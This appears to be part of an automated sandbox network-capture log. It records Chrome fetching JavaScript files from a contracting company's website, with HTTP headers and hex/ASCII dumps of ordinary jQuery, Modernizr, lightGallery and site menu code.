                                              2024-09-27 06:19:44 UTC8000INData Raw: 26 65 2e 74 79 70 65 3d 3d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 74 7c 7c 65 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 74 26 26 61 65 28 65 29 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 22 6c 61 62 65 6c 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64
                                              Data Ascii: &e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisabled!==!t&&ae(e)===t:e.disabled===t:"label"in e&&e.disabled
                                              2024-09-27 06:19:44 UTC8000INData Raw: 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d 7c
                                              Data Ascii: rentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]|
                                              2024-09-27 06:19:44 UTC8000INData Raw: 72 73 2c 53 2e 65 78 70 72 5b 22 3a 22 5d 3d 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 53 2e 75 6e 69 71 75 65 53 6f 72 74 3d 53 2e 75 6e 69 71 75 65 3d 64 2e 75 6e 69 71 75 65 53 6f 72 74 2c 53 2e 74 65 78 74 3d 64 2e 67 65 74 54 65 78 74 2c 53 2e 69 73 58 4d 4c 44 6f 63 3d 64 2e 69 73 58 4d 4c 2c 53 2e 63 6f 6e 74 61 69 6e 73 3d 64 2e 63 6f 6e 74 61 69 6e 73 2c 53 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 64 2e 65 73 63 61 70 65 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 5b 5d 2c 69 3d 76 6f 69 64 20 30 21 3d 3d 6e 3b 77 68 69 6c 65 28 28 65 3d 65 5b 74 5d 29 26 26 39 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 69 66 28 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 7b 69 66 28 69 26 26 53 28 65 29 2e 69
                                              Data Ascii: rs,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var r=[],i=void 0!==n;while((e=e[t])&&9!==e.nodeType)if(1===e.nodeType){if(i&&S(e).i
                                              2024-09-27 06:19:44 UTC8000INData Raw: 28 65 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 29 2c 74 68 69 73 7d 2c 53 2e 65 78 74 65 6e 64 28 7b 69 73 52 65 61 64 79 3a 21 31 2c 72 65 61 64 79 57 61 69 74 3a 31 2c 72 65 61 64 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 21 30 3d 3d 3d 65 3f 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 3a 53 2e 69 73 52 65 61 64 79 29 7c 7c 28 53 2e 69 73 52 65 61 64 79 3d 21 30 29 21 3d 3d 65 26 26 30 3c 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 7c 7c 46 2e 72 65 73 6f 6c 76 65 57 69 74 68 28 45 2c 5b 53 5d 29 7d 7d 29 2c 53 2e 72 65 61 64 79 2e 74 68 65 6e 3d 46 2e 74 68 65 6e 2c 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22
                                              Data Ascii: (e)["catch"](function(e){S.readyException(e)}),this},S.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--S.readyWait:S.isReady)||(S.isReady=!0)!==e&&0<--S.readyWait||F.resolveWith(E,[S])}}),S.ready.then=F.then,"complete"===E.readyState||"loading"
                                              2024-09-27 06:19:44 UTC8000INData Raw: 20 30 29 2c 74 29 6b 65 28 65 2c 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29 2c 21 31 3d 3d 3d 69 29 69 3d 45 65 3b 65 6c 73 65 20 69 66 28 21 69 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 26 26 28 61 3d 69 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 28 29 2e 6f 66 66 28 65 29 2c 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 67 75 69 64 3d 61 2e 67 75 69
                                              Data Ascii: 0),t)ke(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=Ee;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return S().off(e),a.apply(this,arguments)}).guid=a.gui
                                              2024-09-27 06:19:44 UTC8000INData Raw: 6e 2c 72 2c 69 2c 6f 29 7b 72 3d 67 28 72 29 3b 76 61 72 20 65 2c 74 2c 61 2c 73 2c 75 2c 6c 2c 63 3d 30 2c 66 3d 6e 2e 6c 65 6e 67 74 68 2c 70 3d 66 2d 31 2c 64 3d 72 5b 30 5d 2c 68 3d 6d 28 64 29 3b 69 66 28 68 7c 7c 31 3c 66 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 64 26 26 21 79 2e 63 68 65 63 6b 43 6c 6f 6e 65 26 26 44 65 2e 74 65 73 74 28 64 29 29 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 65 71 28 65 29 3b 68 26 26 28 72 5b 30 5d 3d 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 2e 68 74 6d 6c 28 29 29 29 2c 50 65 28 74 2c 72 2c 69 2c 6f 29 7d 29 3b 69 66 28 66 26 26 28 74 3d 28 65 3d 78 65 28 72 2c 6e 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 21 31 2c 6e 2c 6f 29
                                              Data Ascii: n,r,i,o){r=g(r);var e,t,a,s,u,l,c=0,f=n.length,p=f-1,d=r[0],h=m(d);if(h||1<f&&"string"==typeof d&&!y.checkClone&&De.test(d))return n.each(function(e){var t=n.eq(e);h&&(r[0]=d.call(this,e,t.html())),Pe(t,r,i,o)});if(f&&(t=(e=xe(r,n[0].ownerDocument,!1,n,o)
                                              2024-09-27 06:19:44 UTC8000INData Raw: 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 6e 29 3a 6c 5b 74 5d 3d 6e 29 29 7d 7d 2c 63 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 61 2c 73 3d 58 28 74 29 3b 72 65 74 75 72 6e 20 47 65 2e 74 65 73 74 28 74 29 7c 7c 28 74 3d 58 65 28 73 29 29 2c 28 61 3d 53 2e 63 73 73 48 6f 6f 6b 73 5b 74 5d 7c 7c 53 2e 63 73 73 48 6f 6f 6b 73 5b 73 5d 29 26 26 22 67 65 74 22 69 6e 20 61 26 26 28 69 3d 61 2e 67 65 74 28 65 2c 21 30 2c 6e 29 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 42 65 28 65 2c 74
                                              Data Ascii: ckground")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){var i,o,a,s=X(t);return Ge.test(t)||(t=Xe(s)),(a=S.cssHooks[t]||S.cssHooks[s])&&"get"in a&&(i=a.get(e,!0,n)),void 0===i&&(i=Be(e,t
                                              2024-09-27 06:19:44 UTC8000INData Raw: 72 3d 74 5b 61 2b 22 71 75 65 75 65 48 6f 6f 6b 73 22 5d 2c 69 3d 53 2e 74 69 6d 65 72 73 2c 6f 3d 6e 3f 6e 2e 6c 65 6e 67 74 68 3a 30 3b 66 6f 72 28 74 2e 66 69 6e 69 73 68 3d 21 30 2c 53 2e 71 75 65 75 65 28 74 68 69 73 2c 61 2c 5b 5d 29 2c 72 26 26 72 2e 73 74 6f 70 26 26 72 2e 73 74 6f 70 2e 63 61 6c 6c 28 74 68 69 73 2c 21 30 29 2c 65 3d 69 2e 6c 65 6e 67 74 68 3b 65 2d 2d 3b 29 69 5b 65 5d 2e 65 6c 65 6d 3d 3d 3d 74 68 69 73 26 26 69 5b 65 5d 2e 71 75 65 75 65 3d 3d 3d 61 26 26 28 69 5b 65 5d 2e 61 6e 69 6d 2e 73 74 6f 70 28 21 30 29 2c 69 2e 73 70 6c 69 63 65 28 65 2c 31 29 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6f 3b 65 2b 2b 29 6e 5b 65 5d 26 26 6e 5b 65 5d 2e 66 69 6e 69 73 68 26 26 6e 5b 65 5d 2e 66 69 6e 69 73 68 2e 63 61 6c 6c 28 74 68 69 73 29
                                              Data Ascii: r=t[a+"queueHooks"],i=S.timers,o=n?n.length:0;for(t.finish=!0,S.queue(this,a,[]),r&&r.stop&&r.stop.call(this,!0),e=i.length;e--;)i[e].elem===this&&i[e].queue===a&&(i[e].anim.stop(!0),i.splice(e,1));for(e=0;e<o;e++)n[e]&&n[e].finish&&n[e].finish.call(this)
                                              2024-09-27 06:19:44 UTC8000INData Raw: 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 76 6f 69 64 20 30 2c 61 26 26 28 6e 5b 75 5d 3d 61 29 29 2c 65 2e 72 65 73 75 6c 74 7d 7d 2c 73 69 6d 75 6c 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 53 2e 65 78 74 65 6e 64 28 6e 65 77 20 53 2e 45 76 65 6e 74 2c 6e 2c 7b 74 79 70 65 3a 65 2c 69 73 53 69 6d 75 6c 61 74 65 64 3a 21 30 7d 29 3b 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 28 72 2c 6e 75 6c 6c 2c 74 29 7d 7d 29 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 74 72 69 67 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66
                                              Data Ascii: gationStopped()&&f.removeEventListener(d,wt),S.event.triggered=void 0,a&&(n[u]=a)),e.result}},simulate:function(e,t,n){var r=S.extend(new S.Event,n,{type:e,isSimulated:!0});S.event.trigger(r,null,t)}}),S.fn.extend({trigger:function(e,t){return this.each(f


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.465330173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:44 UTC421OUTGET /js/scripts.js HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:44 UTC273INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:44 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 16 Jan 2023 13:11:00 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 20031
                                              Connection: close
                                              Content-Type: application/javascript
                                              2024-09-27 06:19:44 UTC7919INData Raw: 0d 0a 0d 0a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 0d 0a 20 20 20 20 2f 2f 20 48 61 6d 62 75 72 67 65 72 20 6d 65 6e 75 0d 0a 20 20 20 20 69 66 28 65 2e 74 61 72 67 65 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 27 68 61 6d 62 75 72 67 65 72 2d 74 6f 67 67 6c 65 27 29 29 7b 0d 0a 20 20 20 20 20 20 65 2e 74 61 72 67 65 74 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 27 61 63 74 69 76 65 27 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 7d 29 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 2f 2f 20 20 20 61 6c 6c 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 42 61 6c
                                              Data Ascii: document.addEventListener('click',function(e){ // Hamburger menu if(e.target.classList.contains('hamburger-toggle')){ e.target.children[0].classList.toggle('active'); } })// all ------------------function initBal
                                              2024-09-27 06:19:44 UTC8000INData Raw: 3a 20 22 62 75 74 74 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 6e 53 74 65 70 3a 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 74 68 69 73 2e 65 6c 29 2e 66 69 6e 64 28 22 2e 70 65 72 63 65 6e 74 22 29 2e 74 65 78 74 28 4d 61 74 68 2e 72 6f 75 6e 64 28 63 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 7d 29 3b 0d 0a 09 2f 2f 20 20 20 73 68 61 72 65 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 20 20 20 20 76 61 72 20 72 20 3d 20 24 28 22 2e 73 68 61 72 65 2d 77 72 61 70 70 65 72 22 29 3b 0d 0a 20 20 20 20 66 75
                                              Data Ascii: : "butt", onStep: function(a, b, c) { $(this.el).find(".percent").text(Math.round(c)); } }); }); });// share------------------ var r = $(".share-wrapper"); fu
                                              2024-09-27 06:19:44 UTC4112INData Raw: 20 20 20 20 20 20 20 20 20 61 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 63 75 72 72 65 6e 74 32 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 6e 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 62 6c 61 63 6b 2d 62 67 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 28 22 2e 63 75 72 72 65 6e 74 32 22 29 2e 68 61 73 43 6c 61 73 73 28 22 70 61 72 61 6c 6c 61 78 2d 73 65 63 74 69 6f 6e 22 29 29 73 6e 2e 61 64 64 43 6c 61 73 73 28 22 62 6c 61 63 6b 2d 62 67 22 29 3b 20 65 6c 73 65 20 73 6e 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 62 6c 61 63 6b 2d 62 67 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 24 28 22 2e 73 63 72 6f 6c 6c 2d 69 6e
                                              Data Ascii: a.removeClass("current2"); sn.removeClass("black-bg"); } if ($(".current2").hasClass("parallax-section"))sn.addClass("black-bg"); else sn.removeClass("black-bg"); }); }); $(".scroll-in


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.465333173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:44 UTC421OUTGET /js/plugins.js HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:44 UTC274INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:44 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:20:48 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 250764
                                              Connection: close
                                              Content-Type: application/javascript
                                              2024-09-27 06:19:44 UTC7918INData Raw: 3b 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 78 28 61 29 7b 6a 2e 63 73 73 54 65 78 74 3d 61 7d 66 75 6e 63 74 69 6f 6e 20 79 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 78 28 70 72 65 66 69 78 65 73 2e 6a 6f 69 6e 28 61 2b 22 3b 22 29 2b 28 62 7c 7c 22 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 3d 3d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 21 7e 28 22 22 2b 61 29 2e 69 6e 64 65 78 4f 66 28 62 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 61 29 7b 76 61 72 20 65 3d 61 5b 64 5d 3b 69 66 28 21 41 28 65 2c 22 2d 22 29 26 26 6a 5b 65 5d
                                              Data Ascii: ;window.Modernizr=function(a,b,c){function x(a){j.cssText=a}function y(a,b){return x(prefixes.join(a+";")+(b||""))}function z(a,b){return typeof a===b}function A(a,b){return!!~(""+a).indexOf(b)}function B(a,b){for(var d in a){var e=a[d];if(!A(e,"-")&&j[e]
                                              2024-09-27 06:19:44 UTC8000INData Raw: 7c 7c 28 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6e 29 2c 6d 28 63 2c 30 29 29 7d 7d 28 74 68 69 73 2c 64 6f 63 75 6d 65 6e 74 29 2c 4d 6f 64 65 72 6e 69 7a 72 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 79 65 70 6e 6f 70 65 2e 61 70 70 6c 79 28 77 69 6e 64 6f 77 2c 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 29 7d 3b 0a 20 0a 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 6a 73 77 69 6e 67 3d 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 73 77 69 6e 67 3b 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2c 7b 64 65 66 3a 22 65 61 73 65 4f 75 74 51 75 61 64 22 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 61 2c 68 2c 67 29 7b 72 65 74
                                              Data Ascii: ||(n.parentNode.insertBefore(e,n),m(c,0))}}(this,document),Modernizr.load=function(){yepnope.apply(window,[].slice.call(arguments,0))}; jQuery.easing.jswing=jQuery.easing.swing;jQuery.extend(jQuery.easing,{def:"easeOutQuad",swing:function(e,f,a,h,g){ret
                                              2024-09-27 06:19:44 UTC8000INData Raw: 22 29 2c 74 68 69 73 2e 73 2e 73 68 6f 77 41 66 74 65 72 4c 6f 61 64 26 26 74 68 69 73 2e 24 6f 75 74 65 72 2e 61 64 64 43 6c 61 73 73 28 22 6c 67 2d 73 68 6f 77 2d 61 66 74 65 72 2d 6c 6f 61 64 22 29 2c 74 68 69 73 2e 64 6f 43 73 73 28 29 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 24 6f 75 74 65 72 2e 66 69 6e 64 28 22 2e 6c 67 2d 69 6e 6e 65 72 22 29 3b 69 2e 63 73 73 28 22 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 22 2c 74 68 69 73 2e 73 2e 63 73 73 45 61 73 69 6e 67 29 2c 69 2e 63 73 73 28 22 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 22 2c 74 68 69 73 2e 73 2e 73 70 65 65 64 2b 22 6d 73 22 29 7d 61 28 22 2e 6c 67 2d 62 61 63 6b 64 72 6f 70 22 29 2e 61 64 64 43 6c 61 73 73 28 22 69 6e 22 29 2c 73 65 74 54
                                              Data Ascii: "),this.s.showAfterLoad&&this.$outer.addClass("lg-show-after-load"),this.doCss()){var i=this.$outer.find(".lg-inner");i.css("transition-timing-function",this.s.cssEasing),i.css("transition-duration",this.s.speed+"ms")}a(".lg-backdrop").addClass("in"),setT
                                              2024-09-27 06:19:44 UTC8000INData Raw: 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 6c 67 2d 6c 65 66 74 2d 65 6e 64 22 29 7d 2c 34 30 30 29 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 50 72 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 74 68 69 73 2e 24 69 74 65 6d 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 28 62 29 2e 6f 6e 28 22 6b 65 79 75 70 2e 6c 67 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 2e 24 69 74 65 6d 73 2e 6c 65 6e 67 74 68 3e 31 26 26 28 33 37 3d 3d 3d 61 2e 6b 65 79 43 6f 64 65 26 26 28 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 63 2e 67 6f 54 6f 50 72 65 76 53 6c 69 64 65 28 29 29 2c 33 39 3d 3d 3d 61 2e 6b 65 79 43 6f 64 65 26 26 28 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 63 2e 67 6f 54 6f 4e 65 78 74 53 6c
                                              Data Ascii: removeClass("lg-left-end")},400)))},e.prototype.keyPress=function(){var c=this;this.$items.length>1&&a(b).on("keyup.lg",function(a){c.$items.length>1&&(37===a.keyCode&&(a.preventDefault(),c.goToPrevSlide()),39===a.keyCode&&(a.preventDefault(),c.goToNextSl
                                              2024-09-27 06:19:44 UTC8000INData Raw: 2e 6f 6e 28 22 64 62 6c 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 28 61 2c 64 2c 63 29 7d 29 2c 64 2e 6f 6e 28 22 74 6f 75 63 68 73 74 61 72 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 68 3f 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 68 29 2c 68 3d 6e 75 6c 6c 2c 67 28 61 2c 64 2c 63 29 29 3a 68 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 68 3d 6e 75 6c 6c 7d 2c 33 30 30 29 2c 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 29 7d 29 2c 61 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 72 65 73 69 7a 65 2e 6c 67 2e 7a 6f 6f 6d 20 73 63 72 6f 6c 6c 2e 6c 67 2e 7a 6f 6f 6d 20 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 2e 6c 67 2e 7a 6f 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 70 61 67 65 58 3d 61
                                              Data Ascii: .on("dblclick",function(a){g(a,d,c)}),d.on("touchstart",function(a){h?(clearTimeout(h),h=null,g(a,d,c)):h=setTimeout(function(){h=null},300),a.preventDefault()})}),a(window).on("resize.lg.zoom scroll.lg.zoom orientationchange.lg.zoom",function(){b.pageX=a
                                              2024-09-27 06:19:44 UTC8000INData Raw: 28 63 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4d 61 6b 65 20 73 75 72 65 20 79 6f 75 20 68 61 76 65 20 69 6e 63 6c 75 64 65 64 20 76 69 64 65 6f 6a 73 22 29 7d 65 6c 73 65 20 64 2e 70 61 75 73 65 28 29 3b 76 61 72 20 6e 3b 6e 3d 6f 2e 63 6f 72 65 2e 73 2e 64 79 6e 61 6d 69 63 3f 6f 2e 63 6f 72 65 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 6c 5d 2e 73 72 63 3a 6f 2e 63 6f 72 65 2e 24 69 74 65 6d 73 2e 65 71 28 6c 29 2e 61 74 74 72 28 22 68 72 65 66 22 29 7c 7c 6f 2e 63 6f 72 65 2e 24 69 74 65 6d 73 2e 65 71 28 6c 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 72 63 22 29 3b 76 61 72 20 6d 3d 6f 2e 63 6f 72 65 2e 69 73 56 69 64 65 6f 28 6e 2c 6c 29 7c 7c 7b 7d 3b 28 6d 2e 79 6f 75 74 75 62 65 7c 7c 6d 2e 76 69 6d 65 6f 7c 7c 6d 2e 64 61 69 6c 79 6d 6f 74
